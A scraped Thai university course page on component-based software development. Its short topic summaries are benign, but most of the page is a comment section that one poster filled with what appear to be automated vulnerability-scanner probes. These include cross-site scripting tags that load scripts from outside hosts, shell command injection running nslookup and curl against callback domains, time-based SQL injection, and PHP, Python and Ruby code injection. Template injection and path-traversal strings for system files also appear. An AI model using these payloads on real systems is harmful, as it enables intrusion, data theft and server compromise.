7153314 การพัฒนาซอฟต์แวร์เชิงคอมโพเนนต์

Responsive image

7153314 การพัฒนาซอฟต์แวร์เชิงคอมโพเนนต์

คำอธิบายรายวิชา
พื้นฐานการวิเคราะห์และออกแบบเชิงอ็อบเจ็กต์ การพัฒนาซอฟต์แวร์ เชิงคอมโพเนนต์ และเทคโนโลยีที่เกี่ยวข้อง เครื่องมือ ภาษา แนวทางในการพัฒนา รวมถึงการทำแบบจำลอง การออกแบบ การสร้าง การรวบรวม การติดตั้งคอมโพเนนต์ที่ระบบมีอยู่และคอมโพเนนต์ที่พัฒนาขึ้นใช้เอง

จำนวนการเข้าชม
5689 ครั้ง
ผู้เข้าชมภายนอก
916 ครั้ง
คะแนนรายวิชา
คะแนน: 2.50 จากทั้งหมด 5 คะแนน

การพัฒนาซอฟต์แวร์

การพัฒนาซอฟต์แวร์ เป็นกระบวนการผลิตซอฟต์แวร์ (Software Process) เพื่อตอบสนองความต้องการของผู้ใช้ องค์กร หน่วยงาน ได้อย่างเป็นระบบตามรูปแบบของการพัฒนาซอฟต์แวร์ การพัฒนาซอฟต์แวร์เชิงอุตสาหกรรม โดยการนำคอมโพเนนต์หรือซอฟต์แวร์กลับมาใช้และปรับแต่งให้เขากับซอฟต์แวร์ใหม่ เป็นวิธีการพัฒนาที่รวดเร็ว รองรับการเปลี่ยนแปลงทางธุรกิจ ต้องใช้ความสามารถและความเชี่ยวชาญในการพัฒนาให้ได้มาตรฐานตามเทคโนโลยีที่เปลี่ยนแปลง สามารถควบคุมขั้นตอนและวิธีการได้ตามที่กำหนด เป็นการลดความซับซ้อนที่เกิดขึ้นจากข้อกำหนดที่ต้องการระหว่างผู้พัฒนากับองค์กรที่ต้องการขับเคลื่อนธุรกิจด้วยซอฟต์แวร์หรือระบบสารสนเทศต่อไปได้
วิดีโอการสอน

ดาวน์โหลดไฟล์เอกสาร

         ไฟล์นำเสนอ .ppt : การพัฒนาซอฟต์แวร์


วิวัฒนาการของการพัฒนาแอปพลิเคชัน

การพัฒนาแอปพลิเคชันเพื่อให้เกิดผลิตภัณฑ์ที่มีคุณภาพ ซึ่งเปลี่ยนแปลงตามเทคโนโลยีคอมพิวเตอร์ รวมถึงรองรับการประยุกต์กับการดำเนินการทางธุรกิจที่เปลี่ยนแปลงไปตามพฤติกรรมของผู้บริโภค มีการแยกส่วนประกอบของระบบโดยอาศัยแนวคิดเชิงคอมโพเนนต์ ผ่านการพัฒนาเชิงวัตถุ ที่ใช้ส่วนเชื่อมต่อทั้งด้านฮาร์ดแวร์และซอฟต์แวร์เข้ามาช่วยภายในองค์กรและการเชื่อมโยงกับองค์กรภายนอกได้ การเปลี่ยนแปลงกระบวนการผลิตและบริหารจัดการพัฒนาซอฟต์แวร์ที่มีประสิทธิภาพยิ่งขึ้นไปตามความต้องการ
วิดีโอการสอน


แอปพลิเคชันขององค์กรในยุคอินเทอร์เน็ต

แอปพลิเคชันบนมือถือเป็นสิ่งที่เราเริ่มคุ้นเคยและใช้งานกันตั้งแต่ใช้งาน 3G ช่วยให้ชีวิตง่ายขึ้นเพราะสามารถนำมาใช้ตอบสนองต่อการใช้งานในหลายรูปแบบ การใช้งานอินเทอร์เน็ตที่มีประสิทธิภาพมากขึ้น เร็วขึ้น แอปพลิเคชันขององค์กรจึงออกแบบและพัฒนารวมกับการใช้งานเครือข่ายอินเทอร์เน็ต โดยการใช้ผ่านออบเจ็กต์ตามมาตรฐานที่ให้สามารถใช้งานผ่านเครือข่ายอินเทอร์เน็ต เทคโนโลยีในการรวมแอปพลิเคชันขององค์กร
วิดีโอการสอน


พื้นฐานการพัฒนาคอมโพเนนต์

การสร้างคอมโพเนนต์ เพื่อใช้เป็นส่วนประกอบที่เป็นมาตรฐานซอฟต์แวร์ ด้วยวิธีวิศวกรรมซอฟต์แวร์เชิงคอมโพเนนต์ (CBSE) หรือ การพัฒนาซอฟต์แวร์เชิงคอมโพเนนต์ (CBD) เน้นการแยกส่วนย่อยหรือฟังก์ชันการทำงานที่ครอบคลุมทั้งซอฟต์แวร์ ชิ้นส่วนแต่ละชิ้นเรียกว่า “คอมโพเนนต์” ทำให้นำกลับมาใช้ใหม่ได้ โดยการต่อประสานเข้ากับอินเตอร์เฟซที่กำหนดไว้ได้ ช่วยลดขั้นตอนการพัฒนา และแยกความซับซ้อนของการเปลี่ยนแปลง พัฒนาแต่ละชิ้นให้สมบูรณ์ยิ่งขึ้น
วิดีโอการสอน


การพัฒนาคอมโพเนนต์ในเชิงลึก

การพัฒนาคอมโพเนนต์จำเป็นต้องเข้าใจคอมโพเนนต์อย่างละเอียด โดยการจัดทำข้อกำหนดของแต่ละชิ้นส่วน แนวทางการใช้งานคอมโพเนนต์หรือบริการมาใช้ซ้ำได้ คอมโพเนนต์สามารถประกอบเข้ากับส่วนอื่น ๆ ได้ และอธิบายถึงคอมโพเนนต์และวิธีการทำงานเมื่อถูกเรียกใช้ ซึ่งโปรแกรมเมอร์หรือนักออกแบบต้องทำให้เกิดผลลัพธ์ (implementation) ขึ้นอยู่กับ มุมมองแพ็กเกจ (Packaging perspective) มุมมองการให้บริการ (Service perspective) และมุมมองความสมบูรณ์และถูกต้อง (Integrity perspective) ที่ช่วยให้ทำงานร่วมกันได้
วิดีโอการสอน


มาตรฐานและเทคโนโลยีในการพัฒนาเชิงคอมโพเนนต์

ในการออกแบบซอฟต์แวร์ที่ซับซ้อนและการบริหารโครงการให้สำเร็จด้วยจำนวนเงินที่เหมาะสม เกิดจากความพยายามทำกิจกรรมที่หลากหลายให้สมดุลระหว่างองค์ประกอบต่าง ๆ ที่เป็นกุญแจสู่ความสำเร็จ ซึ่งแต่ละคนมีบทบาทสำคัญในการทำงาน ต้องอาศัยมาตรฐานและเทคโนโลยีมาพัฒนาซอฟต์แวร์ โดยการนำคอมโพเนนต์มาประสานกัน ประยุกต์ใช้เทคโนโลยีอย่างมีประสิทธิภาพ และลดช่องว่างการทำงานในองค์กร ด้วยการวิเคราะห์และออกแบบเชิงวัตถุด้วยยูเอ็มแอล เพื่อช่วยให้เข้าใจองค์ประกอบและโครงสร้างของซอฟต์แวร์ที่ต้องการพัฒนาร่วมกันก่อนการพัฒนาซอฟต์แวร์ที่ใช้ได้อย่างเหมาะสม ตัวอย่างเช่น การพัฒนาโครงสร้างพื้นฐานด้วย Cloud ดังภาพ
วิดีโอการสอน


แนวทางในการสร้างแบบจำลองเชิงคอมโพเนนต์

การสร้างแบบจำลองด้วยแนวคิดเชิงคอมโพเนนต์ ซึ่งวงจรของการพัฒนาส่วนประกอบเชิงคอมโพเนนต์ เน้นการออกแบบในการเชื่อมต่อโครงสร้างของเทคโนโลยีเชิงคอมโพเนนต์ เป็นวิธีการทางเทคนิค กระบวนการพัฒนาและการวิเคราะห์พฤติกรรมของแต่ละระบบ ที่ใช้เป็นองค์ประกอบและสถาปัตยกรรมที่เหมาะสมสำหรับแอปพลิเคชัน การสร้างแบบจำลอง ที่ช่วยให้เข้าใจองค์ประกอบที่ใช้แก้ปัญหาระดับองค์กร จึงต้องอธิบายขั้นตอนและเทคนิคการสร้างแบบจำลอง เพื่อเปรียบเทียบเทคนิคการจำลองแนวคิดและการจัดเตรียมโซลูชันที่เหมาะสม เป็นการพัฒนาแอปพลิเคชันด้วยการนำออบเจ็กต์ที่ทำงานร่วมกันของแต่ละส่วนที่ต่อประสานกันด้วยแบบจำลอง
วิดีโอการสอน


แผนภาพประกอบการใช้คอมโพเนนต์

การใช้คอมโพเนนต์เป็นส่วนประกอบสำหรับโซลูชันที่ใช้ในซอฟต์แวร์จำนวนมาก การสร้างแบบจำลองและการใช้แอปพลิเคชันที่มีส่วนประกอบใหม่ ๆ ด้วยการนำเสนอสิ่งที่เป็นรูปธรรมได้ดียิ่งขึ้น เป็นการอธิบายแนวทางการนำองค์ประกอบไปใช้จัดเรียง สับเปลี่ยน ซึ่งสามารถทำได้หลายวิธี และตรงตามความต้องการอย่างเหมาะสม โดยรายละเอียดและวิธีการทั้งหมดที่ใช้ส่วนประกอบต่าง ๆ ประกอบด้วยการเข้าใจบริบท การตรวจสอบสถาปัตยกรรมที่นำมาใช้งาน และการจัดเตรียมแนวทางแก้ไขและดำเนินการที่เหมาะสม ดังตัวอย่างสถาปัตยกรรมแอนดรอยด์ที่ช่วยให้การพัฒนาแอปพลิเคชันทำได้ง่ายขึ้น
วิดีโอการสอน


ข้อกำหนดทางธุรกิจในยุคดิจิตอล

การจัดทำข้อกำหนดที่ธุรกิจด้านเทคโนโลยีสารสนเทศขององค์กรส่วนใหญ่ใช้งาน ถือเป็นแรงกดดันทางธุรกิจที่หลากหลายยิ่งขึ้น เพื่อนำเสนอโซลูชันที่สะดวกและรวดเร็วยิ่งขึ้น นอกจากโซลูชันเหล่านี้จะต้องมีความยืดหยุ่นในการเปลี่ยนแปลงการดำเนินงานทางธุรกิจแล้ว การเปลี่ยนแปลงทางด้านแพลตฟอร์มของฮาร์ดแวร์ที่พัฒนาขึ้นอย่างรวดเร็ว และซอฟต์แวร์รวมถึงสิ่้งที่สนใจด้านธุรกิจที่อยู่ระหว่างการควบรวมกิจการและการปรับโครงสร้างต่าง ๆ ของทรัพยากรในยุคไอที จึงมีการเพิ่มความต้องการที่ตอบสนองในโซลูชันต่าง ๆ เพิ่มขึ้นมากมาย จึงต้องมีการจัดการการเปลี่ยนแปลง เพิ่มมูลค่าขององค์กร การสร้างความเจริญเติบโตบนเครือข่ายอินเทอร์เน็ตเพิ่มขึ้นอย่างรวดเร็วในรูปแบบอิเล็กทรอนิกส์และออนไลน์
วิดีโอการสอน


เทคโนโลยีที่ตอบสนองการให้บริการและโซลูชัน

การพัฒนาส่วนการให้บริการและโซลูชันด้วยเทคโนโยลีต่าง ๆ ที่มีผ่านโครงสร้างพื้นฐานและแพลตฟอร์ม โดยมีกิจกรรมมาตรฐาน เครื่องมือที่ใช้กำหนดทิศทางการปฏิบัติงานและทิศทางในอนาคต ซึ่งการเปลี่ยนแปลงที่รวดเร็วมากขึ้น ปัญหาทางธุรกิจที่ต้องการแก้ไขอย่างถูกต้อง ด้วยการนำเครื่องมือและเทคโนโลยีที่เหมาะสมมาใช้กับผลิตภัณฑ์และการใช้เทคนิคที่ดีทำให้เกิดมาตรฐาน ถือเป็นกลไกในการเลือกคอมโพเนนต์ที่ให้บริการได้ดีขึ้น จึงเห็นได้จากการสร้างแบบจำลองในการนำเทคโนโลยีที่ต่างกัน มาใช้ร่วมกันให้เกิดประโยชน์ได้อย่างรวดเร็ว
วิดีโอการสอน


Comments


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=4576-5112&h=4576-c41c3-2&"></script>


lxbfYeaa

555


lxbfYeaa

course2.php


lxbfYeaa

course2.php


lxbfYeaa

course2.php/.


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

http://hitxqxvgxvftm.bxss.me/


lxbfYeaa

hitxqxvgxvftm.bxss.me


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


lxbfYeaa

555


lxbfYeaa

xfs.bxss.me


lxbfYeaa

963438


lxbfYeaa

http://xfs.bxss.me?ac.th


lxbfYeaa

xfs.bxss.me?ac.th


lxbfYeaa

//xfs.bxss.me?ac.th


lxbfYeaa

/xfs.bxss.me?ac.th


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

response.write(9876921*9083559)


lxbfYeaa

'+response.write(9876921*9083559)+'


lxbfYeaa

"+response.write(9876921*9083559)+"


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

"+"A".concat(70-3).concat(22*4).concat(104).concat(74).concat(106).concat(80)+(require"socket" Socket.gethostbyname("hitna"+"ooccdefe7d13b.bxss.me.")[3].to_s)+"


lxbfYeaa

'+'A'.concat(70-3).concat(22*4).concat(110).concat(87).concat(97).concat(73)+(require'socket' Socket.gethostbyname('hithh'+'zvnbcejh985f2.bxss.me.')[3].to_s)+'


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

echo qcjjwa$() ltmxionz^xyu||a #' &echo qcjjwa$() ltmxionz^xyu||a #|" &echo qcjjwa$() ltmxionz^xyu||a #


lxbfYeaa

&echo ddbnuh$() urxqrrnz^xyu||a #' &echo ddbnuh$() urxqrrnz^xyu||a #|" &echo ddbnuh$() urxqrrnz^xyu||a #


lxbfYeaa

|echo ldpntv$() cztonmnz^xyu||a #' |echo ldpntv$() cztonmnz^xyu||a #|" |echo ldpntv$() cztonmnz^xyu||a #


lxbfYeaa

(nslookup -q=cname hitmsqfkqyhxc891aa.bxss.me||curl hitmsqfkqyhxc891aa.bxss.me))


lxbfYeaa

$(nslookup -q=cname hitdvcrkueobm5a315.bxss.me||curl hitdvcrkueobm5a315.bxss.me)


lxbfYeaa

&nslookup -q=cname hitqfgiapafscbd03f.bxss.me&'"`0&nslookup -q=cname hitqfgiapafscbd03f.bxss.me&`'


lxbfYeaa

&(nslookup -q=cname hitetkqdaapyj69c56.bxss.me||curl hitetkqdaapyj69c56.bxss.me)&'"`0&(nslookup -q=cname hitetkqdaapyj69c56.bxss.me||curl hitetkqdaapyj69c56.bxss.me)&`'


lxbfYeaa

|(nslookup -q=cname hitvmciquhxdj8c2d0.bxss.me||curl hitvmciquhxdj8c2d0.bxss.me)


lxbfYeaa

`(nslookup -q=cname hitwngztxippf80b57.bxss.me||curl hitwngztxippf80b57.bxss.me)`


lxbfYeaa

;(nslookup -q=cname hitnnfqphlizi58512.bxss.me||curl hitnnfqphlizi58512.bxss.me)|(nslookup -q=cname hitnnfqphlizi58512.bxss.me||curl hitnnfqphlizi58512.bxss.me)&(nslookup -q=cname hitnnfqphlizi58512.bxss.me||curl hitnnfqphlizi58512.bxss.me)


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

ZXKq4LWl


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555 bcc:074625.4576-5119.4576.c41c3.19425.2@bxss.me


lxbfYeaa

to@example.com> bcc:074625.4576-5120.4576.c41c3.19425.2@bxss.me


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

12345'"'");|]*{ <>?''????


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555<esi:include src="http://bxss.me/rpb.png"/>


lxbfYeaa

555


lxbfYeaa

${10000000+9999846}


lxbfYeaa

555


lxbfYeaa

'.gethostbyname(lc('hitvl'.'qygypkgqfdcce.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(86).chr(105).chr(75).'


lxbfYeaa

".gethostbyname(lc("hitfx"."ebrxoofe2339e.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(70).chr(107).chr(70)."


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

'"()


lxbfYeaa

555'&&sleep(27*1000)*tvdzsa&&'


lxbfYeaa

555"&&sleep(27*1000)*cipfem&&"


lxbfYeaa

555'||sleep(27*1000)*kjvjcp||'


lxbfYeaa

555"||sleep(27*1000)*fnxcib||"


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


lxbfYeaa

';print(md5(31337));$a='


lxbfYeaa

";print(md5(31337));$a="


lxbfYeaa

${@print(md5(31337))}


lxbfYeaa

${@print(md5(31337))}


lxbfYeaa

'.print(md5(31337)).'


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hituagxzlxkup4c74e.'+'bxss.me')


lxbfYeaa

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hituagxzlxkup4c74e."+"bxss.me")+'


lxbfYeaa

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hituagxzlxkup4c74e.'+'bxss.me')+"


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

)


lxbfYeaa

!(()&&!|*|*|


lxbfYeaa

^(#$!@#$)(()))******


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

HttP://bxss.me/t/xss.html?%00


lxbfYeaa

bxss.me/t/xss.html?%00


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

'"


lxbfYeaa

<!--


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555'"()&%<zzz><ScRiPt >XFqb(9052)</ScRiPt>


lxbfYeaa

'"()&%<zzz><ScRiPt >XFqb(9163)</ScRiPt>


lxbfYeaa

5559254324


lxbfYeaa

bfg7638<s1﹥s2ʺs3ʹhjl7638


lxbfYeaa

bfgx7801??z1??z2a?bcxhjl7801


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

555<ScRiPt >XFqb(9889)</ScRiPt>


lxbfYeaa

555<WGKWQQ>ATWBQ[!+!]</WGKWQQ>


lxbfYeaa

555<script>XFqb(9372)</script>


lxbfYeaa

555<ScR<ScRiPt>IpT>XFqb(9269)</sCr<ScRiPt>IpT>


lxbfYeaa

555<ScRiPt >XFqb(9807)</ScRiPt>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9351></ScRiPt>


lxbfYeaa

555<ScRiPt >XFqb(9488)</ScRiPt>


lxbfYeaa

555<svg ?onload=XFqb(9274);>


lxbfYeaa

555<isindex type=image src=1 onerror=XFqb(9120)>


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9403'>


lxbfYeaa

555<body onload=XFqb(9579)>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=XFqb(9726)>


lxbfYeaa

555<img src=xyz OnErRor=XFqb(9005)>


lxbfYeaa

555<img/src=">" onerror=alert(9122)>


lxbfYeaa

%35%35%35%3C%53%63%52%69%50%74%20%3E%58%46%71%62%289805%29%3C%2F%73%43%72%69%70%54%3E


lxbfYeaa

555u003CScRiPtXFqb(9193)u003C/sCripTu003E


lxbfYeaa

555&lt;ScRiPt&gt;XFqb(9951)&lt;/sCripT&gt;


lxbfYeaa

?<img zzz onmouseover=XFqb(95671) //?>


lxbfYeaa

555<input autofocus onfocus=XFqb(9208)>


lxbfYeaa

<a HrEF=http://xss.bxss.me></a>


lxbfYeaa

<a HrEF=jaVaScRiPT:>


lxbfYeaa

555}body{zzz:Expre/**/SSion(XFqb(9492))}


lxbfYeaa

555EVB13 <ScRiPt >XFqb(9728)</ScRiPt>


lxbfYeaa

555<WPPC0M>GFDMZ[!+!]</WPPC0M>


lxbfYeaa

555<ifRAme sRc=9207.com></IfRamE>


lxbfYeaa

555<a4eqHo0 x=9897>


lxbfYeaa

555<img sRc='http://attacker-9019/log.php?


lxbfYeaa

555<amx3ABo<


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


lxbfYeaa

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg


lxbfYeaa

Http://bxss.me/t/fit.txt


lxbfYeaa

http://bxss.me/t/fit.txt?.jpg


lxbfYeaa

/etc/shells


lxbfYeaa

c:/windows/win.ini


lxbfYeaa

bxss.me


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555&n924915=v900574


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

-1 OR 2+249-249-1=0+0+0+1 --


lxbfYeaa

-1 OR 3+249-249-1=0+0+0+1 --


lxbfYeaa

-1 OR 3*2<(0+5+249-249) --


lxbfYeaa

-1 OR 3*2>(0+5+249-249) --


lxbfYeaa

-1 OR 2+177-177-1=0+0+0+1


lxbfYeaa

-1 OR 3+177-177-1=0+0+0+1


lxbfYeaa

-1 OR 3*2<(0+5+177-177)


lxbfYeaa

-1 OR 3*2>(0+5+177-177)


lxbfYeaa

if(now()=sysdate(),sleep(15),0)


lxbfYeaa

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


lxbfYeaa

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


lxbfYeaa

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


lxbfYeaa

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


lxbfYeaa

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


lxbfYeaa

1'"


lxbfYeaa

1????%2527%2522


lxbfYeaa

@@ZzSYM


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555